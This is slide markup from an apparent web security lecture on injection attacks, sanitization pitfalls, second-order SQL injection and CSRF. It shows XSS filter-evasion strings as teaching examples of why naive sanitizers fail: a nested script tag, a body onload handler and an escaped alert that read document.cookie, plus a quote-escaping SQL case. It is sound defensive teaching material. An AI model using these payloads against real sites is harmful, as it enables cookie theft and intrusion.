            </a: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Continue assignment…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37893" name="Picture 5" descr="&#10;prodsec04.jpg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66875" cy="17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325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Injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="772" name="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240" cy="3428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91960" indent="-2919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mbria"/>
              </a:rPr>
              <a:t>Main problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>unsanitized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria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latin typeface="Cambria"/>
              </a:rPr>
              <a:t>input is evaluated by the server or another user’s browser</a:t>
            </a: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mbria"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="291960" indent="-2919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mbria"/>
              </a:rPr>
              <a:t>Main solution: sanitize input to remove “code” from the data</a:t>
            </a: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mbria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mbria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="773" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609480" y="5105520"/>
            <a:ext cx="7981560" cy="914040"/>
            <a:chOff x="609480" y="5105520"/>
            <a:chExt cx="7981560" cy="914040"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="774" name="Rounded Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="609480" y="5105520"/>
              <a:ext cx="3580920" cy="914040"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="009446"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="006D33"/>
              </a:solidFill>
              <a:rou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400" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>Don’t roll your own crypto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775" name="Rounded Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5010120" y="5105520"/>
              <a:ext cx="3580920" cy="914040"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="009446"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="006D33"/>
              </a:solidFill>
              <a:rou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tIns="45000" rIns="90000" bIns="45000" anchor="ctr" anchorCtr="1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400" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>Don’t write your own sanitization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776" name="Right Arrow 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3835080" y="5178960"/>
              <a:ext cx="1447560" cy="766800"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 38177"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E47932"/>
            </a:solidFill>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="A85924"/>
              </a:solidFill>
              <a:miter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28469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Sanitizing Is Not Easy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="778" name="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3809520" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="009446"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="006D33"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="96000"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Remove cases of “&lt;script&gt;”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1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79" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1761480" y="2124720"/>
            <a:ext cx="7274160" cy="40356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>
            <a:solidFill>
              <a:srgbClr val="71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&lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&lt;/scr&lt;/script&gt;ipt&gt;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80" name="Content Placeholder 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2829240"/>
            <a:ext cx="4571640" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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anchor="ctr">
            <a:normAutofit fontScale="84500" lnSpcReduction="10000"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Recursively Remove cases of “&lt;script&gt;”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1" name="TextBox 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3701880" y="3546000"/>
            <a:ext cx="5139000" cy="40356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>
            <a:solidFill>
              <a:srgbClr val="71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&lt;body onload=“alert(document.cookie)”&gt;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82" name="Content Placeholder 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483480" y="4278600"/>
            <a:ext cx="6983640" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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anchor="ctr">
            <a:normAutofit fontScale="77000" lnSpcReduction="20000"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Recursively Remove cases of “&lt;script&gt;” and JS keywords like “alert”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3" name="TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3977640" y="5099400"/>
            <a:ext cx="4587480" cy="40356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>
            <a:solidFill>
              <a:srgbClr val="71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¼script¾a\u006ert(¢XSS¢)¼/script¾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84" name="TextBox 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066680" y="5691240"/>
            <a:ext cx="6825960" cy="728640"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
              <a:gd name="adj3" fmla="val 32166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These tend to be server/browser specific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65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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean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Frontier Sanitization”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="169A48"/>
              </a:solidFill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786" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629400" y="3321000"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="787" name="Arc 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5344560" y="2540160"/>
            <a:ext cx="3809520" cy="3657240"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 5554325"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101520">
              <a:srgbClr val="E47932">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:glow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788" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1329480"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="789" name="Picture 8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="909360" y="3060720"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="790" name="Picture 9"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="5088600"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="791" name="Straight Arrow Connector 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="1883880"/>
            <a:ext cx="3352320" cy="1731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2" name="Straight Arrow Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3043080" y="3657600"/>
            <a:ext cx="3357360" cy="555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3" name="Straight Arrow Connector 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3124080" y="4833720"/>
            <a:ext cx="3276360" cy="808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4" name="TextBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="1504080"/>
            <a:ext cx="3642840" cy="1004400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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ambria"/>
              </a:rPr>
              <a:t>Sanitize all input immediately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ambria"/>
              </a:rPr>
              <a:t>(SQL, XSS, bash, etc.)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95" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990720" y="2743200"/>
            <a:ext cx="7314840" cy="1447560"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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Cambria"/>
              </a:rPr>
              <a:t>What order should the sanitization routines be applied? SQL then XSS, XSS then SQL?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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747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Second-Order SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="797" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028040" y="2371320"/>
            <a:ext cx="1239840" cy="178524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4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7347240" y="2323800"/>
            <a:ext cx="1339200" cy="1851840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="799" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="363240" y="2736000"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="800" name="Arc 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3016080" y="1905120"/>
            <a:ext cx="2863080" cy="2971440"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 5554325"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101520">
              <a:srgbClr val="E47932">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:glow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1" name="Straight Arrow Connector 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362320" y="3290400"/>
            <a:ext cx="1523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625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2" name="Straight Arrow Connector 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5443200" y="2190960"/>
            <a:ext cx="1599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625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3" name="TextBox 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2393280" y="2921040"/>
            <a:ext cx="653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evil'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4" name="TextBox 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3111840" y="2894760"/>
            <a:ext cx="731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evil\'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5" name="TextBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3373200" y="1483560"/>
            <a:ext cx="122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Sanitizer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6" name="TextBox 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5344560" y="1600200"/>
            <a:ext cx="37231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insert into sessions (username, sessionID) values (‘evil\’’, 1234)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07" name="TextBox 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410080" y="2306880"/>
            <a:ext cx="1665720" cy="94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select * from sessions where sessionID = 1234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08" name="Straight Arrow Connector 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5475960" y="3064680"/>
            <a:ext cx="1599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625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9" name="Straight Arrow Connector 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5475960" y="3333960"/>
            <a:ext cx="1599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625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10" name="TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5702040" y="3358440"/>
            <a:ext cx="7707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evil'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11" name="Straight Arrow Connector 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5524920" y="4439880"/>
            <a:ext cx="1599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625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12" name="TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410080" y="3690720"/>
            <a:ext cx="1665720" cy="94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select * from users where username = ‘evil’’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13" name="Straight Arrow Connector 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5475960" y="5162760"/>
            <a:ext cx="1599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625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14" name="TextBox 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5540040" y="4767120"/>
            <a:ext cx="16657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HORRIBLE ERROR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15" name="Rounded Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="780480" y="5565960"/>
            <a:ext cx="7467120" cy="76176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Cambria"/>
              </a:rPr>
              <a:t>Sanitizing input once sometimes isn’t enough!</a:t>
            </a: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279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Context-Specific Sanitization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="817" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="2722320"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="818" name="Arc 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6605640" y="1295280"/>
            <a:ext cx="2049120" cy="1988280"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 5554325"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101520">
              <a:srgbClr val="E47932">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:glow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19" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1329480"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="820" name="Picture 8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="909360" y="3060720"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="821" name="Picture 9"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="5088600"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="822" name="Straight Arrow Connector 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="1883880"/>
            <a:ext cx="1447560" cy="100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3" name="Straight Arrow Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3043080" y="3657600"/>
            <a:ext cx="1528560" cy="151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4" name="Straight Arrow Connector 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3124080" y="4723560"/>
            <a:ext cx="1447560" cy="918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25" name="Picture 19"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7260120" y="1625040"/>
            <a:ext cx="910800" cy="1259640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="826" name="Straight Arrow Connector 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6172200" y="2056680"/>
            <a:ext cx="914040" cy="45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7" name="Straight Arrow Connector 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6237360" y="2408040"/>
            <a:ext cx="914040" cy="45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8" name="Curved Connector 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3363480" y="4170240"/>
            <a:ext cx="2808720" cy="1854000"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -13983"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="508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29" name="Arc 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6085440" y="3894120"/>
            <a:ext cx="2049120" cy="1988280"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 300417"/>
              <a:gd name="adj2" fmla="val 4258914"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101520">
              <a:srgbClr val="009446">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:glow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30" name="TextBox 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6563520" y="3404520"/>
            <a:ext cx="2133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SQL Sanitization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31" name="TextBox 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5662800" y="5960880"/>
            <a:ext cx="2108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XSS Sanitization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558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Content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mj-lt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 sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRP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Cross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Site Scripting (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XSS)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Injection Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a: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Multi-Party Web Applications</a:t>
            </a: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Web Security Issues</a:t>
            </a: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Continue assignment…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37893" name="Picture 5" descr="&#10;prodsec04.jpg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66875" cy="17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3346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Cross Site Request Forgery (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean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CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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37" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219320" y="2591160"/>
            <a:ext cx="1447560" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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838" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="2591160"/>
            <a:ext cx="1447560" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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839" name="Text Box 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6392160" y="2133960"/>
            <a:ext cx="100728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Cambria"/>
              </a:rPr>
              <a:t>Server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0" name="Text Box 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325160" y="2133960"/>
            <a:ext cx="123588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Cambria"/>
              </a:rPr>
              <a:t>Browser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1" name="Line 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2637360" y="2972040"/>
            <a:ext cx="3534840" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="line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2" name="Text Box 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="345000">
            <a:off x="3539880" y="2514120"/>
            <a:ext cx="190764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POST/login.cgi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3" name="Line 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2666880" y="5181720"/>
            <a:ext cx="3505320" cy="295200"/>
          </a:xfrm>
          <a:prstGeom prst="line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4" name="Line 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2666880" y="3733800"/>
            <a:ext cx="3505320" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line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5" name="Line 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2666880" y="6096120"/>
            <a:ext cx="3505320" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line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6" name="Text Box 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21279000">
            <a:off x="2871000" y="3582240"/>
            <a:ext cx="311616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Set-cookie: authenticator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7" name="Text Box 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="404400">
            <a:off x="3154320" y="4722360"/>
            <a:ext cx="2612520" cy="852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ts val="2001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GET…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2001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Cookie: authenticator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8" name="Text Box 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21279000">
            <a:off x="3838680" y="5895600"/>
            <a:ext cx="122652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response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9" name="Rounded Rectangular Callout 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152280" y="3886440"/>
            <a:ext cx="2133360" cy="2057040"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 90576"/>
              <a:gd name="adj2" fmla="val 4537"/>
              <a:gd name="adj3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Cambria"/>
              </a:rPr>
              <a:t>Sent on every page request...</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
